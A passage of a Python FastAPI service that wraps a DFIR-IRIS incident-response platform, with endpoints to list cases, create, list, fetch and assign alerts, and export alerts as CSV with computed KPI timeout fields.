  2233. sort_by: str = "case_id",
  2234. sort_dir: str = "desc",
  2235. filter_name: str | None = None,
  2236. ) -> ApiResponse:
  2237. # adapter maps (limit, offset) → (per_page, page) for IRIS v2
  2238. offset = (page - 1) * per_page
  2239. try:
  2240. raw = await iris_adapter.list_cases(limit=per_page, offset=offset)
  2241. except Exception as exc:
  2242. raise HTTPException(status_code=502, detail=f"IRIS case list failed: {exc}") from exc
  2243. enriched = _enrich_cases_with_kpi(raw)
  2244. items = enriched.get("data") or enriched.get("items", [])
  2245. total = enriched.get("total", len(items))
  2246. last_page = enriched.get("last_page", max(1, -(-total // per_page)))
  2247. if filter_name:
  2248. items = [c for c in items if filter_name.lower() in (c.get("case_name") or "").lower()]
  2249. reverse = sort_dir == "desc"
  2250. items.sort(key=lambda c: c.get(sort_by) or 0, reverse=reverse)
  2251. return ApiResponse(data={"cases": {
  2252. "data": items,
  2253. "total": total,
  2254. "current_page": page,
  2255. "last_page": last_page,
  2256. }})
  2257. @app.post(
  2258. "/iris/alerts",
  2259. response_model=ApiResponse,
  2260. summary="Create IRIS alert",
  2261. description="Create a new alert in DFIR-IRIS via /api/v2/alerts.",
  2262. )
  2263. async def iris_create_alert(payload: IrisAlertCreateRequest) -> ApiResponse:
  2264. alert_payload: dict[str, Any] = {
  2265. "alert_title": payload.title,
  2266. "alert_description": payload.description,
  2267. "alert_severity_id": payload.severity_id,
  2268. "alert_status_id": payload.status_id,
  2269. "alert_source": payload.source,
  2270. "alert_customer_id": payload.customer_id or settings.iris_default_customer_id,
  2271. "alert_source_event_time": datetime.now(timezone.utc).isoformat(),
  2272. }
  2273. if payload.source_ref:
  2274. alert_payload["alert_source_ref"] = payload.source_ref
  2275. if payload.payload:
  2276. alert_payload.update(payload.payload)
  2277. try:
  2278. result = await iris_adapter.create_alert(alert_payload)
  2279. except Exception as exc:
  2280. raise HTTPException(status_code=502, detail=f"IRIS alert create failed: {exc}") from exc
  2281. return ApiResponse(data={"alert": result})
  2282. @app.get(
  2283. "/iris/alerts",
  2284. response_model=ApiResponse,
  2285. summary="List IRIS alerts with KPI Timeout",
  2286. description="Fetch alerts from DFIR-IRIS and annotate each row with computed KPI Timeout data.",
  2287. )
  2288. async def iris_list_alerts(
  2289. page: int = 1,
  2290. per_page: int = 20,
  2291. sort_by: str = "alert_id",
  2292. sort_dir: str = "desc",
  2293. filter_title: str | None = None,
  2294. filter_owner_id: int | None = None,
  2295. ) -> ApiResponse:
  2296. try:
  2297. raw = await iris_adapter.list_alerts(
  2298. page=page,
  2299. per_page=per_page,
  2300. sort_by=sort_by,
  2301. sort_dir=sort_dir,
  2302. filter_title=filter_title,
  2303. filter_owner_id=filter_owner_id,
  2304. )
  2305. enriched = _enrich_alerts_with_kpi(raw)
  2306. return ApiResponse(data={
  2307. "alerts": {
  2308. "data": enriched.get("data", []),
  2309. "total": enriched.get("total", 0),
  2310. "current_page": enriched.get("current_page", page),
  2311. "last_page": enriched.get("last_page", 1),
  2312. }
  2313. })
  2314. except Exception as exc:
  2315. raise HTTPException(status_code=502, detail=f"IRIS alert list failed: {exc}") from exc
  2316. @app.get(
  2317. "/iris/alerts/export-csv",
  2318. summary="Export IRIS alerts as CSV",
  2319. description="Download all matching alerts (up to 1000) as a CSV attachment.",
  2320. )
  2321. async def iris_export_alerts_csv(
  2322. sort_by: str = "alert_id",
  2323. sort_dir: str = "desc",
  2324. filter_title: str | None = None,
  2325. filter_owner_id: int | None = None,
  2326. ) -> StreamingResponse:
  2327. try:
  2328. raw = await iris_adapter.list_alerts(
  2329. page=1,
  2330. per_page=1000,
  2331. sort_by=sort_by,
  2332. sort_dir=sort_dir,
  2333. filter_title=filter_title,
  2334. filter_owner_id=filter_owner_id,
  2335. )
  2336. except Exception as exc:
  2337. raise HTTPException(status_code=502, detail=f"IRIS alert export failed: {exc}") from exc
  2338. enriched = _enrich_alerts_with_kpi(raw)
  2339. alerts = enriched.get("data", [])
  2340. output = io.StringIO()
  2341. fieldnames = [
  2342. "alert_id", "alert_title", "alert_severity", "alert_status",
  2343. "alert_creation_time", "alert_source_event_time", "alert_owner",
  2344. "kpi_pct", "kpi_status",
  2345. ]
  2346. writer = csv.DictWriter(output, fieldnames=fieldnames, extrasaction="ignore")
  2347. writer.writeheader()
  2348. for alert in alerts:
  2349. kpi = alert.get("kpi", {})
  2350. severity_name = (alert.get("severity") or {}).get("severity_name", "")
  2351. writer.writerow({
  2352. "alert_id": alert.get("alert_id", ""),
  2353. "alert_title": alert.get("alert_title", ""),
  2354. "alert_severity": severity_name,
  2355. "alert_status": (alert.get("status") or {}).get("status_name", ""),
  2356. "alert_creation_time": alert.get("alert_creation_time", ""),
  2357. "alert_source_event_time": alert.get("alert_source_event_time", ""),
  2358. "alert_owner": (alert.get("owner") or {}).get("user_name", ""),
  2359. "kpi_pct": kpi.get("kpi_pct", ""),
  2360. "kpi_status": kpi.get("status", ""),
  2361. })
  2362. output.seek(0)
  2363. return StreamingResponse(
  2364. iter([output.getvalue()]),
  2365. media_type="text/csv",
  2366. headers={"Content-Disposition": "attachment; filename=iris_alerts.csv"},
  2367. )
  2368. @app.get(
  2369. "/iris/alerts/{alert_id}",
  2370. response_model=ApiResponse,
  2371. summary="Get single IRIS alert with KPI",
  2372. description="Fetch one DFIR-IRIS alert by ID and annotate with computed KPI data.",
  2373. )
  2374. async def iris_get_alert(alert_id: int) -> ApiResponse:
  2375. try:
  2376. raw = await iris_adapter.get_alert(alert_id)
  2377. except Exception as exc:
  2378. raise HTTPException(status_code=502, detail=f"IRIS alert fetch failed: {exc}") from exc
  2379. # Wrap in list-shaped dict so _enrich_alerts_with_kpi can process it
  2380. alert = raw if isinstance(raw, dict) else {}
  2381. wrapper = {"data": [alert]}
  2382. enriched = _enrich_alerts_with_kpi(wrapper)
  2383. alert_out = enriched["data"][0] if enriched.get("data") else alert
  2384. return ApiResponse(data={"alert": alert_out})
  2385. @app.post(
  2386. "/iris/alerts/{alert_id}/assign",
  2387. response_model=ApiResponse,
  2388. summary="Assign IRIS alert to owner",
  2389. description="Update the owner of a DFIR-IRIS alert.",
  2390. )
  2391. async def iris_assign_alert(alert_id: int, body: dict) -> ApiResponse:
  2392. owner_id = body.get("owner_id")
  2393. if not isinstance(owner_id, int):
  2394. raise HTTPException(status_code=422, detail="owner_id must be an integer")
  2395. try:
  2396. result = await iris_adapter.assign_alert(alert_id=alert_id, owner_id=owner_id)
  2397. return ApiResponse(data=result)
  2398. except Exception as exc:
  2399. raise HTTPException(status_code=502, detail=f"IRIS alert assign failed: {exc}") from exc